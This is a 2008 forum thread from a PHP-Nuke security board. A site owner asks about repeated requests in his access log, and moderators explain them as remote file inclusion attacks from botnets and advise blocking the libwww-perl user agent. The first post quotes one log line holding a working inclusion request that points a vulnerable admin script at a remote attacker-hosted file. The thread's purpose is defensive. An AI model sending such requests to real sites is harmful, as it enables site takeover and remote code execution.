Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Unit1
Worker
Worker


Joined: Oct 26, 2004
Posts: 134
Location: Boston

PostPosted: Sat Aug 16, 2008 7:38 pm Reply with quote

Can some one let me know what they are trying to do ? I am seeing a lot of this on my site
Quote:
85.12.15.28 - - [16/Aug/2008:15:22:05 -0600] "GET //phphost_directoryv2/include/admin.php?rd=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 500 823 "-" "libwww-perl/5.810"


Thanks for any info
 
View user's profile Send private message
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Sat Aug 16, 2008 9:54 pm Reply with quote

Remote File Inclusion Only registered users can see links on this board! Get registered or login!

PHP Hosting Directory v2 Only registered users can see links on this board! Get registered or login!

Robots don't care you aren't using this software.. they just scan every site and if you happen to use it, bingo... easy hacked site

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Unit1
PostPosted: Tue Aug 19, 2008 5:55 pm Reply with quote

Thank you evaders99 for the info

I did ban the ips but now it is coming from others here in the USA what is the best way to stop this completely on the site
 
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Tue Aug 19, 2008 6:51 pm Reply with quote

Probably using spoofed IPs, so blocking won't help.

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
evaders99
PostPosted: Tue Aug 19, 2008 7:03 pm Reply with quote

Or hacked servers by this botnet
You should use NukeSentinel or .htaccess rules to block libwww-perl
 
Unit1
PostPosted: Sat Aug 23, 2008 8:12 pm Reply with quote

Thank you both for the help I should of did a search of the site on this problem as you have answered this problem many times in the past. As I get older I forget more. adding the block I now see just one in the logs instead of many

Stay safe and have a great day
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©